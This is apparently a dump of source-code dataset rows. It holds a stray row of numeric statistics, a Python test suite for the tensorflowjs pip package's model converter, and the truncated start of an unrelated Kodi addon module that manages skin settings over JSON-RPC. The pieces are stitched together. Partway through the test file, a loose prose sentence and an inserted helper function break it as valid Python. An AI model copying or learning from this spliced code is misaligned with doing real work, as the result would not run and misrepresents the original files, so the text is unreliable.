| 32.809524 | 65 | 0.703919 | 79 | 689 | 6.037975 | 0.670886 | 0.044025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158645 | 0.185776 | 689 | 21 | 66 | 32.809524 | 0.691622 | 0.335269 | 0 | 0 | 0 | 0 | 0.220982 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 86920ec1c0159b8548b81683e13e218d1875aaf1 | 33,860 | py | Python | python/test_pip_package.py | syt123450/tfjs-converter | a90fa59a44d9425beb7b1584fe753c62d62bbc4d | ["Apache-2.0"] | null | null | null | python/test_pip_package.py | syt123450/tfjs-converter | a90fa59a44d9425beb7b1584fe753c62d62bbc4d | ["Apache-2.0"] | null | null | null | python/test_pip_package.py | syt123450/tfjs-converter | a90fa59a44d9425beb7b1584fe753c62d62bbc4d | ["Apache-2.0"] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test the Python API and shell binary of the tensorflowjs pip package."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.saved_model.save import save
import tensorflow_hub as hub
import tensorflowjs as tfjs
def _createKerasModel(layer_name_prefix, h5_path=None):
"""Create a Keras model for testing.
Args:
layer_name_prefix: A prefix string for layer names. This helps avoid
clashes in layer names between different test methods.
h5_path: Optional string path for a HDF5 (.h5) file to save the model
in.
Returns:
An instance of keras.Model.
"""
input_tensor = keras.layers.Input((3, ))
dense1 = keras.layers.Dense(
4,
use_bias=True,
kernel_initializer='ones',
bias_initializer='zeros',
name=layer_name_prefix + '1')(input_tensor)
output = keras.layers.Dense(
2,
use_bias=False,
kernel_initializer='ones',
name=layer_name_prefix + '2')(dense1)
model = keras.models.Model(inputs=[input_tensor], outputs=[output])
if h5_path:
model.save(h5_path)
return model
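A minimal sketch, mirroring what the tests below exercise, of round-tripping the toy model through the converter API (os, tempfile and tensorflowjs are already imported at the top of this file):

def _roundtrip_demo():
    model = _createKerasModel('Demo')
    out_dir = tempfile.mkdtemp()
    tfjs.converters.save_keras_model(model, out_dir)  # writes model.json plus weight shards
    return tfjs.converters.load_keras_model(os.path.join(out_dir, 'model.json'))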
def _createTensorFlowSavedModelV1(name_scope, save_path):
"""Create a TensorFlow SavedModel for testing.
Args:
name_scope: Name scope to create the model under. This helps avoid
op and variable name clashes between different test methods.
save_path: The directory path in which to save the model.
"""
graph = tf.Graph()
with graph.as_default():
with tf.compat.v1.name_scope(name_scope):
x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]])
w = tf.compat.v1.get_variable('w', shape=[2, 2])
y = tf.compat.v1.matmul(x, w)
output = tf.compat.v1.nn.softmax(y)
init_op = w.initializer
# Create a builder.
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map={
"serving_default":
tf.compat.v1.saved_model.signature_def_utils.predict_signature_def(
inputs={"x": x},
outputs={"output": output})
},
assets_collection=None)
builder.save()
def _createTensorFlowSavedModel(name_scope, save_path):
"""Create a TensorFlow SavedModel for testing.
Args:
name_scope: Name scope to create the model under. This helps avoid
op and variable name clashes between different test methods.
save_path: The directory path in which to save the model.
"""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(lambda x: root.v1 * root.v2 * x)
to_save = root.f.get_concrete_function(input_data)
save(root, save_path, to_save)
def _create_hub_module(save_path):
"""Create a TensorFlow Hub module for testing.
Args:
save_path: The directory path in which to save the model.
"""
# Module function that doubles its input.
def double_module_fn():
w = tf.Variable([2.0, 4.0])
x = tf.compat.v1.placeholder(dtype=tf.float32)
hub.add_signature(inputs=x, outputs=x*w)
graph = tf.Graph()
with graph.as_default():
spec = hub.create_module_spec(double_module_fn)
m = hub.Module(spec)
# Export the module.
with tf.compat.v1.Session(graph=graph) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
m.export(save_path, sess)
class APIAndShellTest(tf.test.TestCase):
"""Tests for the Python API of the pip package."""
@classmethod
def setUpClass(cls):
cls.class_tmp_dir = tempfile.mkdtemp()
cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model')
cls.tf_saved_model_v1_dir = os.path.join(
cls.class_tmp_dir, 'tf_saved_model_v1')
_createTensorFlowSavedModel('a', cls.tf_saved_model_dir)
_createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir)
cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module')
_create_hub_module(cls.tf_hub_module_dir)
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.class_tmp_dir)
def setUp(self):
# Make sure this file is not being run from the source directory, to
# avoid picking up source files.
if os.path.isdir(
os.path.join(os.path.dirname(__file__), 'tensorflowjs')):
self.fail('Do not run this test from the Python source directory. '
'This file is intended to be run on pip install.')
self._tmp_dir = tempfile.mkdtemp()
super(APIAndShellTest, self).setUp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(APIAndShellTest, self).tearDown()
def testVersionString(self):
self.assertEqual(2, tfjs.__version__.count('.'))
def testSaveKerasModel(self):
with self.test_session():
# First create a toy keras model.
model = _createKerasModel('MergedDense')
tfjs.converters.save_keras_model(model, self._tmp_dir)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json')) as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDense1/kernel', 'MergedDense1/bias',
'MergedDense2/kernel'
]))
self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDense1/bias'], [4])
self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32')
def testLoadKerasModel(self):
# Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision.
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
model1 = _createKerasModel('MergedDense')
tfjs.converters.save_keras_model(model1, self._tmp_dir)
model1_weight_values = model1.get_weights()
with tf.Graph().as_default(), tf.compat.v1.Session():
# Load the model from saved artifacts.
model2 = tfjs.converters.load_keras_model(
os.path.join(self._tmp_dir, 'model.json'))
# Compare the loaded model with the original one.
model2_weight_values = model2.get_weights()
self.assertEqual(len(model1_weight_values), len(model2_weight_values))
for model1_weight_value, model2_weight_value in zip(
model1_weight_values, model2_weight_values):
self.assertAllClose(model1_weight_value, model2_weight_value)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*')))
def testInvalidInputFormatRaisesError(self):
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format',
'nonsensical_format', self._tmp_dir, self._tmp_dir
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(b'--input_format', tf.compat.as_bytes(stderr))
def testMissingInputPathRaisesError(self):
process = subprocess.Popen(
[
'tensorflowjs_converter'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(b'input_path', tf.compat.as_bytes(stderr))
def testKerasH5ConversionWorksFromCLI(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
_createKerasModel('MergedDenseForCLI', h5_path)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',
'MergedDenseForCLI2/kernel'
]))
self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])
self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')
# Verify that there is only one weight group due to the default
# non-split_weights_by_layer behavior. The model is a small one, which
# does not exceed the 4-MB shard size limit. Therefore, there should
# be only one weight file.
self.assertEqual(
1, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))
def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
_createKerasModel('MergedDenseForCLI', h5_path)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras',
'--split_weights_by_layer', h5_path, self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',
'MergedDenseForCLI2/kernel'
]))
self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])
self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')
    # Verify that there are two weight groups (one per layer with
    # weights) due to the --split_weights_by_layer flag. The model is
    # small, so no layer's weights exceed the 4-MB shard size limit.
self.assertEqual(
2, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))
def testKerasH5ConversionWithSignatureNameErrors(self):
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format', 'keras',
'--signature_name', 'bar',
os.path.join(self._tmp_dir, 'foo.h5'),
os.path.join(self._tmp_dir, 'output')
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(
b'The --signature_name flag is applicable only to',
tf.compat.as_bytes(stderr))
def testConvertTFSavedModelV1WithCommandLineWorks(self):
    output_dir = self._tmp_dir
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_saved_model',
'--output_format', 'tfjs_graph_model',
self.tf_saved_model_v1_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}]
    # Load the model JSON and check its weights manifest.
    with open(os.path.join(output_dir, 'model.json'), 'rt') as f:
      output_json = json.load(f)
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFHubModuleWithCommandLineWorks(self):
    output_dir = self._tmp_dir
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_hub',
self.tf_hub_module_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'shape': [2],
'name': 'module/Variable',
'dtype': 'float32'
}]
}]
    # Load the model JSON and check its weights manifest.
    with open(os.path.join(output_dir, 'model.json'), 'rt') as f:
      output_json = json.load(f)
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFSavedModelWithCommandLineWorks(self):
    output_dir = self._tmp_dir
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_saved_model',
'--output_format', 'tfjs_graph_model',
self.tf_saved_model_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'dtype': 'float32',
'shape': [],
'name': 'StatefulPartitionedCall/mul'
}]
}]
    # Load the model JSON and check its weights manifest.
    with open(os.path.join(output_dir, 'model.json'), 'rt') as f:
      output_json = json.load(f)
weights_manifest = output_json['weightsManifest']
self.assertEqual(len(weights_manifest), len(weights))
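    # assertItemsEqual is the Python 2 name of Python 3's assertCountEqual;
    # both compare collections while ignoring order.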
if sys.version_info[0] < 3:
self.assertItemsEqual(weights_manifest[0]['paths'],
weights[0]['paths'])
self.assertItemsEqual(weights_manifest[0]['weights'],
weights[0]['weights'])
else:
self.assertCountEqual(weights_manifest[0]['paths'],
weights[0]['paths'])
self.assertCountEqual(weights_manifest[0]['weights'],
weights[0]['weights'])
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTensorflowjsArtifactsToKerasH5(self):
# 1. Create a toy keras model and save it as an HDF5 file.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
with tf.Graph().as_default(), tf.compat.v1.Session():
model = _createKerasModel('MergedDenseForCLI', h5_path)
model_json = model.to_json()
# 2. Convert the HDF5 file to tensorflowjs format.
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tensorflowjs artifacts back to HDF5.
new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras',
os.path.join(self._tmp_dir, 'model.json'), new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Load the model back from the new HDF5 file and compare with the
# original model.
with tf.Graph().as_default(), tf.compat.v1.Session():
model_2 = keras.models.load_model(new_h5_path)
model_2_json = model_2.to_json()
self.assertEqual(model_json, model_2_json)
def testLoadTensorflowjsArtifactsAsKerasModel(self):
# 1. Create a toy keras model and save it as an HDF5 file.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
with tf.Graph().as_default(), tf.compat.v1.Session():
model = _createKerasModel('MergedDenseForCLI', h5_path)
model_json = model.to_json()
# 2. Convert the HDF5 file to tensorflowjs format.
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Load the tensorflowjs artifacts as a keras.Model instance.
with tf.Graph().as_default(), tf.compat.v1.Session():
model_2 = tfjs.converters.load_keras_model(
os.path.join(self._tmp_dir, 'model.json'))
model_2_json = model_2.to_json()
self.assertEqual(model_json, model_2_json)
def testVersion(self):
process = subprocess.Popen(
['tensorflowjs_converter', '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertIn(
tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
tf.compat.as_bytes(stdout))
process = subprocess.Popen(
['tensorflowjs_converter', '-v'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertIn(
tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
tf.compat.as_bytes(stdout))
class ConvertTfKerasSavedModelTest(tf.test.TestCase):
def setUp(self):
super(ConvertTfKerasSavedModelTest, self).setUp()
self._tmp_dir = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(ConvertTfKerasSavedModelTest, self).tearDown()
def _createSimpleSequentialModel(self):
model = keras.Sequential()
model.add(keras.layers.Reshape([2, 3], input_shape=[6]))
model.add(keras.layers.LSTM(10))
model.add(keras.layers.Dense(1, activation='sigmoid'))
return model
def _createNestedSequentialModel(self):
model = keras.Sequential()
model.add(keras.layers.Dense(6, input_shape=[10], activation='relu'))
model.add(self._createSimpleSequentialModel())
return model
def _createFunctionalModelWithWeights(self):
input1 = keras.Input(shape=[8])
input2 = keras.Input(shape=[10])
y = keras.layers.Concatenate()([input1, input2])
y = keras.layers.Dense(4, activation='softmax')(y)
model = keras.Model([input1, input2], y)
return model
def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
      # 1. Run model.predict() and store the result, then save the model
      # as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
model_json_path = os.path.join(tfjs_output_dir, 'model.json')
self.assertTrue(os.path.isfile(model_json_path))
# 3. Convert the tfjs model to keras h5 format.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras', model_json_path, new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
self.assertTrue(os.path.isfile(new_h5_path))
# 4. Load the model back and assert on the equality of the predict
# results.
model_prime = keras.models.load_model(new_h5_path)
new_y = model_prime.predict(x)
self.assertAllClose(y, new_y)
def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x1 = np.random.randn(4, 8)
x2 = np.random.randn(4, 10)
      # 1. Run model.predict() and store the result, then save the model
      # as a SavedModel.
model = self._createFunctionalModelWithWeights()
y = model.predict([x1, x2])
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Use explicit --output_format value: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
'--output_format', 'tfjs_layers_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
model_json_path = os.path.join(tfjs_output_dir, 'model.json')
self.assertTrue(os.path.isfile(model_json_path))
# 3. Convert the tfjs model to keras h5 format.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras', model_json_path, new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
self.assertTrue(os.path.isfile(new_h5_path))
# 4. Load the model back and assert on the equality of the predict
# results.
model_prime = keras.models.load_model(new_h5_path)
new_y = model_prime.predict([x1, x2])
self.assertAllClose(y, new_y)
def testUsingIncorrectKerasSavedModelRaisesError(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
      # 1. Run model.predict() and store the result, then save the model
      # as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Use incorrect --input_format value: keras
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format', 'keras',
self._tmp_dir, tfjs_output_dir
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertIn(
b'Expected path to point to an HDF5 file, '
b'but it points to a directory', tf.compat.as_bytes(stderr))
def testConvertTfjsLayersModelIntoShardedWeights(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
      # 1. Run model.predict() and store the result, then save the model
      # as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
weights = model.get_weights()
total_weight_bytes = sum(np.size(w) for w in weights) * 4
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs_layers_model format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_layers_model,
# with sharded weights.
weight_shard_size_bytes = int(total_weight_bytes * 0.3)
# Due to the shard size, there ought to be 4 shards after conversion.
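    # A shard size of 0.3x the total yields ceil(1 / 0.3) = 4 shards:
    # three full shards plus one smaller remainder shard.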
sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_layers_model',
'--weight_shard_size_bytes', str(weight_shard_size_bytes),
os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the sharded weight files and their sizes.
weight_files = sorted(
glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 4)
weight_file_sizes = [os.path.getsize(f) for f in weight_files]
self.assertEqual(sum(weight_file_sizes), total_weight_bytes)
self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])
self.assertEqual(weight_file_sizes[0], weight_file_sizes[2])
self.assertLess(weight_file_sizes[3], weight_file_sizes[0])
# 5. Convert the sharded tfjs_layers_model back into a keras h5 file.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
os.path.join(sharded_model_dir, 'model.json'), new_h5_path
])
process.communicate()
self.assertEqual(0, process.returncode)
with tf.Graph().as_default(), tf.compat.v1.Session():
# 6. Load the keras model and check the predict() output is close to
# before.
new_model = keras.models.load_model(new_h5_path)
new_y = new_model.predict(x)
self.assertAllClose(new_y, y)
def testConvertTfjsLayersModelWithQuantization(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
      # 1. Run model.predict() and store the result, then save the model
      # as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
weights = model.get_weights()
total_weight_bytes = sum(np.size(w) for w in weights) * 4
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs_layers_model format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_layers_model,
# with uint16 quantization.
sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_layers_model',
'--quantization_bytes', '2',
os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the quantized weight file and its size.
weight_files = sorted(
glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 1)
weight_file_size = os.path.getsize(weight_files[0])
# The size of the weight file should reflect the uint16 quantization.
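    # (float32 weights take 4 bytes each; 2-byte quantization stores them
    # as uint16, halving the total weight payload.)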
self.assertEqual(weight_file_size, total_weight_bytes // 2)
def testConvertTfjsLayersModelToTfjsGraphModel(self):
# 1. Create a model for testing.
model = keras.Sequential()
model.add(keras.layers.Dense(10, activation='relu', input_shape=[4]))
model.add(keras.layers.Dense(1, activation='sigmoid'))
h5_path = os.path.join(self._tmp_dir, 'model.h5')
model.save(h5_path)
# 2. Convert the keras saved model to tfjs_layers_model format.
layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras',
h5_path, layers_model_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_graph_model.
graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_graph_model',
os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the model.json and weight file and its size.
self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json')))
weight_files = sorted(
glob.glob(os.path.join(graph_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 1)
if __name__ == '__main__':
tf.test.main()
script.ezclean/resources/lib/modules/skinz.py | rrosajp/script.ezclean | py | Python | 7,195 bytes | MIT | 5 stars
# -*- coding: UTF-8 -*-
import glob, os, re, shutil, time, xbmc
from resources.lib.modules import control
try: import json as simplejson
except ImportError: import simplejson
ADDONS = os.path.join(control.HOMEPATH, 'addons')
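# Return the id of the currently active Kodi skin.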
def currSkin():
return control.skin
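# Read a Kodi setting via the JSON-RPC Settings.GetSettingValue method;
# returns None if the value cannot be retrieved.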
def getOld(old):
try:
old = '"%s"' % old
query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":%s}, "id":1}' % (old)
response = control.jsonrpc(query)
response = simplejson.loads(response)
        if 'result' in response:
            if 'value' in response['result']:
                return response['result']['value']
    except Exception:
        pass
return None
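# Write a Kodi setting via the JSON-RPC Settings.SetSettingValue method.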
def setNew(new, value):
try:
new = '"%s"' % new
value = '"%s"' % value
query = '{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":%s,"value":%s}, "id":1}' % (new, value)
response = control.jsonrpc(query)
    except Exception:
pass
return None
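# Switch the active skin by writing the 'lookandfeel.skin' setting.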
def swapSkins(skin):
old = 'lookandfeel.skin'
value = skin
current = getOld(old)
new = old
setNew(new, value)
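# Save the current look-and-feel settings into this addon's own settings
# (do='save'), or restore them back to Kodi (any other value).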
def lookandFeelData(do='save'):
scan = ['lookandfeel.enablerssfeeds', 'lookandfeel.font', 'lookandfeel.rssedit', 'lookandfeel.skincolors', 'lookandfeel.skintheme', 'lookandfeel.skinzoom', 'lookandfeel.soundskin', 'lookandfeel.startupwindow', 'lookandfeel.stereostrength']
if do == 'save':
for item in scan:
query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"%s"}, "id":1}' % (item)
response = control.jsonrpc(query)
if not 'error' in response:
match = re.compile('{"value":(.+?)}').findall(str(response))
